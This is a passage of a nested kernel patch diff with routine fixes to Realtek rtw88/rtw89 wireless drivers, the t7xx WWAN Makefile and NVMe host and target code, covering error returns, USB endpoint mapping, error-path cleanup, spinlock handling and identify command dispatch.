+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -287,7 +287,7 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 	num = sscanf(tmp, "%x %x %x", &addr, &val, &len);
+ 
+ 	if (num !=  3)
+-		return count;
++		return -EINVAL;
+ 
+ 	switch (len) {
+ 	case 1:
+@@ -375,8 +375,8 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -386,7 +386,7 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 	if (num != 4) {
+ 		rtl_dbg(rtlpriv, COMP_ERR, DBG_DMESG,
+ 			"Format is <path> <addr> <mask> <data>\n");
+-		return count;
++		return -EINVAL;
+ 	}
+ 
+ 	rtl_set_rfreg(hw, path, addr, bitmask, data);
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index aa7c5901ef260..8625a0a1430ac 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -233,7 +233,7 @@ static int rtw_pwr_seq_parser(struct rtw_dev *rtwdev,
+ 
+ 		ret = rtw_sub_pwr_seq_parser(rtwdev, intf_mask, cut_mask, cmd);
+ 		if (ret)
+-			return -EBUSY;
++			return ret;
+ 
+ 		idx++;
+ 	} while (1);
+@@ -247,6 +247,7 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	const struct rtw_pwr_seq_cmd **pwr_seq;
+ 	u8 rpwm;
+ 	bool cur_pwr;
++	int ret;
+ 
+ 	if (rtw_chip_wcpu_11ac(rtwdev)) {
+ 		rpwm = rtw_read8(rtwdev, rtwdev->hci.rpwm_addr);
+@@ -270,8 +271,9 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 		return -EALREADY;
+ 
+ 	pwr_seq = pwr_on ? chip->pwr_on_seq : chip->pwr_off_seq;
+-	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+-		return -EINVAL;
++	ret = rtw_pwr_seq_parser(rtwdev, pwr_seq);
++	if (ret)
++		return ret;
+ 
+ 	if (pwr_on)
+ 		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 17f800f6efbd0..67efa58dd78ee 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -47,7 +47,7 @@ static int rtw8821c_read_efuse(struct rtw_dev *rtwdev, u8 *log_map)
+ 
+ 	map = (struct rtw8821c_efuse *)log_map;
+ 
+-	efuse->rfe_option = map->rfe_option;
++	efuse->rfe_option = map->rfe_option & 0x1f;
+ 	efuse->rf_board_option = map->rf_board_option;
+ 	efuse->crystal_cap = map->xtal_k;
+ 	efuse->pa_type_2g = map->pa_type;
+@@ -1537,7 +1537,6 @@ static const struct rtw_rfe_def rtw8821c_rfe_defs[] = {
+ 	[2] = RTW_DEF_RFE_EXT(8821c, 0, 0, 2),
+ 	[4] = RTW_DEF_RFE_EXT(8821c, 0, 0, 2),
+ 	[6] = RTW_DEF_RFE(8821c, 0, 0),
+-	[34] = RTW_DEF_RFE(8821c, 0, 0),
+ };
+ 
+ static struct rtw_hw_reg rtw8821c_dig[] = {
+diff --git a/drivers/net/wireless/realtek/rtw88/usb.c b/drivers/net/wireless/realtek/rtw88/usb.c
+index 2a8336b1847a5..a10d6fef4ffaf 100644
+--- a/drivers/net/wireless/realtek/rtw88/usb.c
++++ b/drivers/net/wireless/realtek/rtw88/usb.c
+@@ -118,6 +118,22 @@ static void rtw_usb_write32(struct rtw_dev *rtwdev, u32 addr, u32 val)
+ 	rtw_usb_write(rtwdev, addr, val, 4);
+ }
+ 
++static int dma_mapping_to_ep(enum rtw_dma_mapping dma_mapping)
++{
++	switch (dma_mapping) {
++	case RTW_DMA_MAPPING_HIGH:
++		return 0;
++	case RTW_DMA_MAPPING_NORMAL:
++		return 1;
++	case RTW_DMA_MAPPING_LOW:
++		return 2;
++	case RTW_DMA_MAPPING_EXTRA:
++		return 3;
++	default:
++		return -EINVAL;
++	}
++}
++
+ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 			 struct usb_interface *interface)
+ {
+@@ -129,6 +145,8 @@ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 	int num_out_pipes = 0;
+ 	int i;
+ 	u8 num;
++	const struct rtw_chip_info *chip = rtwdev->chip;
++	const struct rtw_rqpn *rqpn;
+ 
+ 	for (i = 0; i < interface_desc->bNumEndpoints; i++) {
+ 		endpoint = &host_interface->endpoint[i].desc;
+@@ -183,31 +201,34 @@ static int rtw_usb_parse(struct rtw_dev *rtwdev,
+ 
+ 	rtwdev->hci.bulkout_num = num_out_pipes;
+ 
+-	switch (num_out_pipes) {
+-	case 4:
+-	case 3:
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = 2;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID4] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID5] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID6] = 0;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID7] = 0;
+-		break;
+-	case 2:
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = 1;
+-		rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = 1;
+-		break;
+-	case 1:
+-		break;
+-	default:
+-		rtw_err(rtwdev, "failed to get out_pipes(%d)\n", num_out_pipes);
++	if (num_out_pipes < 1 || num_out_pipes > 4) {
++		rtw_err(rtwdev, "invalid number of endpoints %d\n", num_out_pipes);
+ 		return -EINVAL;
+ 	}
+ 
++	rqpn = &chip->rqpn_table[num_out_pipes];
++
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID0] = dma_mapping_to_ep(rqpn->dma_map_be);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID1] = dma_mapping_to_ep(rqpn->dma_map_bk);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID2] = dma_mapping_to_ep(rqpn->dma_map_bk);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID3] = dma_mapping_to_ep(rqpn->dma_map_be);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID4] = dma_mapping_to_ep(rqpn->dma_map_vi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID5] = dma_mapping_to_ep(rqpn->dma_map_vi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID6] = dma_mapping_to_ep(rqpn->dma_map_vo);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID7] = dma_mapping_to_ep(rqpn->dma_map_vo);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID8] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID9] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID10] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID11] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID12] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID13] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID14] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_TID15] = -EINVAL;
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_BEACON] = dma_mapping_to_ep(rqpn->dma_map_hi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_HIGH] = dma_mapping_to_ep(rqpn->dma_map_hi);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_MGMT] = dma_mapping_to_ep(rqpn->dma_map_mg);
++	rtwusb->qsel_to_ep[TX_DESC_QSEL_H2C] = dma_mapping_to_ep(rqpn->dma_map_hi);
++
+ 	return 0;
+ }
+ 
+@@ -250,7 +271,7 @@ static void rtw_usb_write_port_tx_complete(struct urb *urb)
+ static int qsel_to_ep(struct rtw_usb *rtwusb, unsigned int qsel)
+ {
+ 	if (qsel >= ARRAY_SIZE(rtwusb->qsel_to_ep))
+-		return 0;
++		return -EINVAL;
+ 
+ 	return rtwusb->qsel_to_ep[qsel];
+ }
+@@ -265,6 +286,9 @@ static int rtw_usb_write_port(struct rtw_dev *rtwdev, u8 qsel, struct sk_buff *s
+ 	int ret;
+ 	int ep = qsel_to_ep(rtwusb, qsel);
+ 
++	if (ep < 0)
++		return ep;
++
+ 	pipe = usb_sndbulkpipe(usbd, rtwusb->out_ep[ep]);
+ 	urb = usb_alloc_urb(0, GFP_ATOMIC);
+ 	if (!urb)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index e99eccf11c762..08c6d1a8c712d 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3374,18 +3374,22 @@ static int rtw89_core_register_hw(struct rtw89_dev *rtwdev)
+ 	ret = ieee80211_register_hw(hw);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to register hw\n");
+-		goto err;
++		goto err_free_supported_band;
+ 	}
+ 
+ 	ret = rtw89_regd_init(rtwdev, rtw89_regd_notifier);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to init regd\n");
+-		goto err;
++		goto err_unregister_hw;
+ 	}
+ 
+ 	return 0;
+ 
+-err:
++err_unregister_hw:
++	ieee80211_unregister_hw(hw);
++err_free_supported_band:
++	rtw89_core_clr_supported_band(rtwdev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 0ea734c81b4f0..e3129ba1ea200 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -3874,25 +3874,26 @@ int rtw89_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rtw89_pci_link_cfg(rtwdev);
+ 	rtw89_pci_l1ss_cfg(rtwdev);
+ 
+-	ret = rtw89_core_register(rtwdev);
+-	if (ret) {
+-		rtw89_err(rtwdev, "failed to register core\n");
+-		goto err_clear_resource;
+-	}
+-
+ 	rtw89_core_napi_init(rtwdev);
+ 
+ 	ret = rtw89_pci_request_irq(rtwdev, pdev);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to request pci irq\n");
+-		goto err_unregister;
++		goto err_deinit_napi;
++	}
++
++	ret = rtw89_core_register(rtwdev);
++	if (ret) {
++		rtw89_err(rtwdev, "failed to register core\n");
++		goto err_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
+-err_unregister:
++err_free_irq:
++	rtw89_pci_free_irq(rtwdev, pdev);
++err_deinit_napi:
+ 	rtw89_core_napi_deinit(rtwdev);
+-	rtw89_core_unregister(rtwdev);
+ err_clear_resource:
+ 	rtw89_pci_clear_resource(rtwdev, pdev);
+ err_declaim_pci:
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852b.c b/drivers/net/wireless/realtek/rtw89/rtw8852b.c
+index b635ac1d1ca2f..81b348631519d 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852b.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852b.c
+@@ -1284,7 +1284,7 @@ static void rtw8852b_ctrl_cck_en(struct rtw89_dev *rtwdev, bool cck_en)
+ static void rtw8852b_5m_mask(struct rtw89_dev *rtwdev, const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+@@ -1292,12 +1292,13 @@ static void rtw8852b_5m_mask(struct rtw89_dev *rtwdev, const struct rtw89_chan *
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		/* Prich=1: Mask 5M High, Prich=2: Mask 5M Low */
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+ 		/* Prich=3: Mask 5M High, Prich=4: Mask 5M Low, Else: Disable */
+-		mask_5m_en = pri_ch == 3 || pri_ch == 4;
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c.c b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+index a87482cc25f58..4f57d76ba26f7 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c.c
+@@ -1445,18 +1445,19 @@ static void rtw8852c_5m_mask(struct rtw89_dev *rtwdev,
+ 			     const struct rtw89_chan *chan,
+ 			     enum rtw89_phy_idx phy_idx)
+ {
+-	u8 pri_ch = chan->primary_channel;
++	u8 pri_ch = chan->pri_ch_idx;
+ 	bool mask_5m_low;
+ 	bool mask_5m_en;
+ 
+ 	switch (chan->band_width) {
+ 	case RTW89_CHANNEL_WIDTH_40:
+ 		mask_5m_en = true;
+-		mask_5m_low = pri_ch == 2;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWER;
+ 		break;
+ 	case RTW89_CHANNEL_WIDTH_80:
+-		mask_5m_en = ((pri_ch == 3) || (pri_ch == 4));
+-		mask_5m_low = pri_ch == 4;
++		mask_5m_en = pri_ch == RTW89_SC_20_UPMOST ||
++			     pri_ch == RTW89_SC_20_LOWEST;
++		mask_5m_low = pri_ch == RTW89_SC_20_LOWEST;
+ 		break;
+ 	default:
+ 		mask_5m_en = false;
+diff --git a/drivers/net/wwan/t7xx/Makefile b/drivers/net/wwan/t7xx/Makefile
+index 268ff9e87e5b3..2652cd00504e6 100644
+--- a/drivers/net/wwan/t7xx/Makefile
++++ b/drivers/net/wwan/t7xx/Makefile
+@@ -1,7 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
+-ccflags-y += -Werror
+-
+ obj-${CONFIG_MTK_T7XX} := mtk_t7xx.o
+ mtk_t7xx-y:=	t7xx_pci.o \
+ 		t7xx_pcie_mac.o \
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index c0429f9f50920..d567762545b05 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4808,8 +4808,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 	u32 aer_notice_type = nvme_aer_subtype(result);
+ 	bool requeue = true;
+ 
+-	trace_nvme_async_event(ctrl, aer_notice_type);
+-
+ 	switch (aer_notice_type) {
+ 	case NVME_AER_NOTICE_NS_CHANGED:
+ 		set_bit(NVME_AER_NOTICE_NS_CHANGED, &ctrl->events);
+@@ -4845,7 +4843,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 
+ static void nvme_handle_aer_persistent_error(struct nvme_ctrl *ctrl)
+ {
+-	trace_nvme_async_event(ctrl, NVME_AER_ERROR);
+ 	dev_warn(ctrl->device, "resetting controller due to AER\n");
+ 	nvme_reset_ctrl(ctrl);
+ }
+@@ -4861,6 +4858,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	if (le16_to_cpu(status) >> 1 != NVME_SC_SUCCESS)
+ 		return;
+ 
++	trace_nvme_async_event(ctrl, result);
+ 	switch (aer_type) {
+ 	case NVME_AER_NOTICE:
+ 		requeue = nvme_handle_aen_notice(ctrl, result);
+@@ -4878,7 +4876,6 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	case NVME_AER_SMART:
+ 	case NVME_AER_CSS:
+ 	case NVME_AER_VS:
+-		trace_nvme_async_event(ctrl, aer_type);
+ 		ctrl->aen_result = result;
+ 		break;
+ 	default:
+diff --git a/drivers/nvme/host/trace.h b/drivers/nvme/host/trace.h
+index 6f0eaf6a15282..4fb5922ffdac5 100644
+--- a/drivers/nvme/host/trace.h
++++ b/drivers/nvme/host/trace.h
+@@ -127,15 +127,12 @@ TRACE_EVENT(nvme_async_event,
+ 	),
+ 	TP_printk("nvme%d: NVME_AEN=%#08x [%s]",
+ 		__entry->ctrl_id, __entry->result,
+-		__print_symbolic(__entry->result,
+-		aer_name(NVME_AER_NOTICE_NS_CHANGED),
+-		aer_name(NVME_AER_NOTICE_ANA),
+-		aer_name(NVME_AER_NOTICE_FW_ACT_STARTING),
+-		aer_name(NVME_AER_NOTICE_DISC_CHANGED),
+-		aer_name(NVME_AER_ERROR),
+-		aer_name(NVME_AER_SMART),
+-		aer_name(NVME_AER_CSS),
+-		aer_name(NVME_AER_VS))
++		__print_symbolic(__entry->result & 0x7,
++			aer_name(NVME_AER_ERROR),
++			aer_name(NVME_AER_SMART),
++			aer_name(NVME_AER_NOTICE),
++			aer_name(NVME_AER_CSS),
++			aer_name(NVME_AER_VS))
+ 	)
+ );
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index 6a54ed6fb1214..29b73e6581d73 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -685,6 +685,13 @@ static bool nvmet_handle_identify_desclist(struct nvmet_req *req)
+ 	}
+ }
+ 
++static void nvmet_execute_identify_ctrl_nvm(struct nvmet_req *req)
++{
++	/* Not supported: return zeroes */
++	nvmet_req_complete(req,
++		   nvmet_zero_sgl(req, 0, sizeof(struct nvme_id_ctrl_nvm)));
++}
++
+ static void nvmet_execute_identify(struct nvmet_req *req)
+ {
+ 	if (!nvmet_check_transfer_len(req, NVME_IDENTIFY_DATA_SIZE))
+@@ -692,13 +699,8 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 
+ 	switch (req->cmd->identify.cns) {
+ 	case NVME_ID_CNS_NS:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ns(req);
+-		default:
+-			break;
+-		}
+-		break;
++		nvmet_execute_identify_ns(req);
++		return;
+ 	case NVME_ID_CNS_CS_NS:
+ 		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+ 			switch (req->cmd->identify.csi) {
+@@ -710,29 +712,24 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 		}
+ 		break;
+ 	case NVME_ID_CNS_CTRL:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ctrl(req);
+-		}
+-		break;
++		nvmet_execute_identify_ctrl(req);
++		return;
+ 	case NVME_ID_CNS_CS_CTRL:
+-		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+-			switch (req->cmd->identify.csi) {
+-			case NVME_CSI_ZNS:
+-				return nvmet_execute_identify_cns_cs_ctrl(req);
+-			default:
+-				break;
+-			}
+-		}
+-		break;
+-	case NVME_ID_CNS_NS_ACTIVE_LIST:
+ 		switch (req->cmd->identify.csi) {
+ 		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_nslist(req);
+-		default:
++			nvmet_execute_identify_ctrl_nvm(req);
++			return;
++		case NVME_CSI_ZNS:
++			if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
++				nvmet_execute_identify_ctrl_zns(req);
++				return;
++			}
+ 			break;
+ 		}
+ 		break;
++	case NVME_ID_CNS_NS_ACTIVE_LIST:
++		nvmet_execute_identify_nslist(req);
++		return;
+ 	case NVME_ID_CNS_NS_DESC_LIST:
+ 		if (nvmet_handle_identify_desclist(req) == true)
+ 			return;
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index 5c16372f3b533..c780af36c1d4a 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -614,10 +614,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, fcp_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq = tfcp_req->fcpreq;
++	unsigned long flags;
+ 	int ret = 0;
+ 	bool aborted = false;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 		tfcp_req->inistate = INI_IO_ACTIVE;
+@@ -626,11 +627,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 		aborted = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(aborted))
+ 		ret = -ECANCELED;
+@@ -655,8 +656,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		container_of(work, struct fcloop_fcpreq, abort_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq;
+ 	bool completed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_ABORTED:
+@@ -665,11 +667,11 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		completed = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(completed)) {
+ 		/* remove reference taken in original abort downcall */
+@@ -681,9 +683,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		nvmet_fc_rcv_fcp_abort(tfcp_req->tport->targetport,
+ 					&tfcp_req->tgt_fcp_req);
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->fcpreq = NULL;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, -ECANCELED);
+ 	/* call_host_done releases reference for abort downcall */
+@@ -699,11 +701,12 @@ fcloop_tgt_fcprqst_done_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, tio_done_work);
+ 	struct nvmefc_fcp_req *fcpreq;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	tfcp_req->inistate = INI_IO_COMPLETED;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, tfcp_req->status);
+ }
+@@ -807,13 +810,14 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 	u32 rsplen = 0, xfrlen = 0;
+ 	int fcp_err = 0, active, aborted;
+ 	u8 op = tgt_fcpreq->op;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	active = tfcp_req->active;
+ 	aborted = tfcp_req->aborted;
+ 	tfcp_req->active = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(active))
+ 		/* illegal - call while i/o active */
+@@ -821,9 +825,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 
+ 	if (unlikely(aborted)) {
+ 		/* target transport has aborted i/o prior */
+-		spin_lock_irq(&tfcp_req->reqlock);
++		spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 		tfcp_req->active = false;
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		tgt_fcpreq->transferred_length = 0;
+ 		tgt_fcpreq->fcp_error = -ECANCELED;
+ 		tgt_fcpreq->done(tgt_fcpreq);
+@@ -880,9 +884,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 		break;
+ 	}
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->active = false;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tgt_fcpreq->transferred_length = xfrlen;
+ 	tgt_fcpreq->fcp_error = fcp_err;
+@@ -896,15 +900,16 @@ fcloop_tgt_fcp_abort(struct nvmet_fc_target_port *tgtport,
+ 			struct nvmefc_tgt_fcp_req *tgt_fcpreq)
+ {
+ 	struct fcloop_fcpreq *tfcp_req = tgt_fcp_req_to_fcpreq(tgt_fcpreq);
++	unsigned long flags;
+ 
+ 	/*
+ 	 * mark aborted only in case there were 2 threads in transport
+ 	 * (one doing io, other doing abort) and only kills ops posted
+ 	 * after the abort request
+ 	 */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->aborted = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tfcp_req->status = NVME_SC_INTERNAL;
+ 
+@@ -946,6 +951,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 	struct fcloop_ini_fcpreq *inireq = fcpreq->private;
+ 	struct fcloop_fcpreq *tfcp_req;
+ 	bool abortio = true;
++	unsigned long flags;
+ 
+ 	spin_lock(&inireq->inilock);
+ 	tfcp_req = inireq->tfcp_req;
+@@ -958,7 +964,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		return;
+ 
+ 	/* break initiator/target relationship for io */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 	case INI_IO_ACTIVE:
+@@ -968,11 +974,11 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		abortio = false;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (abortio)
+ 		/* leave the reference while the work item is scheduled */
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index 89bedfcd974c4..ed3786140965f 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -581,7 +581,7 @@ bool nvmet_ns_revalidate(struct nvmet_ns *ns);
+ u16 blk_to_nvme_status(struct nvmet_req *req, blk_status_t blk_sts);
+ 
+ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns);
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req);
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req);
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_recv(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_send(struct nvmet_req *req);
+diff --git a/drivers/nvme/target/zns.c b/drivers/nvme/target/zns.c
+index 1254cf57e008d..d93ee4ae19454 100644
+--- a/drivers/nvme/target/zns.c
++++ b/drivers/nvme/target/zns.c
+@@ -70,7 +70,7 @@ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns)
+ 	return true;
+ }
+ 
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req)
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req)
+ {
